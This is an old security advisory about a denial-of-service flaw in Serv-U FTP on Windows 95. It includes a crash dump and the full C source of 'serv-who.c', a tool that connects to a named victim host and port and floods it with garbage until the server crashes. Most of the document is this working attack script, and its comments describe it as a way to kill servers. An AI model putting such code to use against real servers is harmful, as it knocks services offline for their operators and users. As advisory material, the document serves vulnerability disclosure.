COMMAND

    Serv-U FTP

SYSTEMS AFFECTED

    Win95

PROBLEM

    whiz found the following problem in Serv-U FTP by Cat-Soft.  After you
    connect, instead of sending the normal USER then PASS, you can send
    garbage.  If you send a lot of garbage at high speed, Serv-U will stop
    responding to mouse clicks and, after a short amount of time, will
    crash and give you this:

        SERV-U32 caused a stack fault in module KERNEL32.DLL at 014f:bff9a08c.
        Registers:
        EAX=005e2084 CS=014f EIP=bff9a08c EFLGS=00000246
        EBX=17bf0514 SS=0157 ESP=005e2080 EBP=005e20d4
        ECX=005e2098 DS=0157 ESI=81628c70 FS=2347
        EDX=ffffffff ES=0157 EDI=0000ffff GS=0000
        Bytes at CS:EIP:
        5e 8b e5 5d c2 10 00 64 a1 00 00 00 00 55 8b ec
        Stack dump:
        00000001 c00000fd 00000000 00000000 bff9a08c 00000000 01570157 01870028
        17bf0b6a c10fabe8 16c70001 80dc0014 16e73a45 00040000 02000000 bff97fdc

    It only behaves this way in the Windows 95 version.  Under NT the CPU
    usage goes up to 100%, but there is no crash.  Often, even after the
    crashed Serv-U has closed, Windows remains slow or unresponsive.  The
    program used for this follows:

    /*
            serv-who.c - 1998 - whiz
            kills Serv-U ftp on win95 boxes

            Tested on:
            i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a
            i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b
            ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3
            i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2

            >>> Thanks to gen for helping me test this. <<<

            Another thing that might affect this program is how fast the
            serv-who computer's internet connection is -- in other words,
            how much faster it is than the victim's link.  A faster one
            will give a higher success rate.
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>


    int x, s, i, p, dport;

    char *str =
    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    *
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    struct sockaddr_in addr, spoofedaddr;
    struct hostent *host;


    int open_sock(int sock, char *server, int port) {
         struct sockaddr_in blah;
         struct hostent *he;
         bzero((char *)&blah,sizeof(blah));
         blah.sin_family=AF_INET;
         blah.sin_addr.s_addr=inet_addr(server);
         blah.sin_port=htons(port);

        if ((he = gethostbyname(server)) != NULL) {
            bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
        }
        else {
             if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
               perror("gethostbyname()");
               return(-3);
             }
        }

            if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
                 perror("connect()");
                 close(sock);
                 return(-4);
            }
            printf("     Connected to [%s:%d].\n",server,port);
            return;
    }


    void main(int argc, char *argv[]) {
         int t;
         if (argc != 3) {
           printf("serv-who.c - whiz\n\n");
           printf("kills serv-u ftp daemons\n\n");
           printf("Usage: %s <victim> <port>\n",argv[0]);
           exit(0);
         }
         printf("serv-who.c - whiz\n\n");
         if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
            perror("socket()");
            exit(-1);
         }
         p = atoi(argv[2]);
         open_sock(s,argv[1],p);

         printf("     Sending crap to %s on port %i... \n", argv[1], p);
         for (i=0; i<1000; i++) {            /* loop is REAL high, most likely
    */
           send(s,str,strlen(str),0x0);      /* it will exit with a */
                             send(s,str,strlen(str)*20+1,0x0); /* "Broken Pipe" error before */
           send(s,str,strlen(str)*25+2,0x0); /* finishing the loop */
           send(s,str,strlen(str)*30+3,0x0);
           send(s,str,strlen(str)*35+4,0x0);
           send(s,str,strlen(str)*40+5,0x0); /* i just went crazy on the sends */
           send(s,str,strlen(str)*45+4,0x0); /* pay no attention to them */
           send(s,str,strlen(str)*50+5,0x0);
           send(s,str,strlen(str)*255+4,0x0);
           send(s,str,strlen(str)*182+5,0x0);
           send(s,str,strlen(str)*888+4,0x0);
           send(s,str,strlen(str)*666+5,0x0);
           send(s,str,strlen(str)*20+1,0x0);
           send(s,str,strlen(str)*25+2,0x0);
           send(s,str,strlen(str)*30+3,0x0);
           send(s,str,strlen(str)*35+4,0x0);
           send(s,str,strlen(str)*40+5,0x0);
           send(s,str,strlen(str)*45+4,0x0);
           send(s,str,strlen(str)*50+5,0x0);
           send(s,str,strlen(str)*255+4,0x0);
           send(s,str,strlen(str)*182+5,0x0);
           send(s,str,strlen(str)*888+4,0x0);
           send(s,str,strlen(str)*666+5,0x0);
         }
         printf("all done\n");
         close(s);
    }

SOLUTION

    Nothing yet.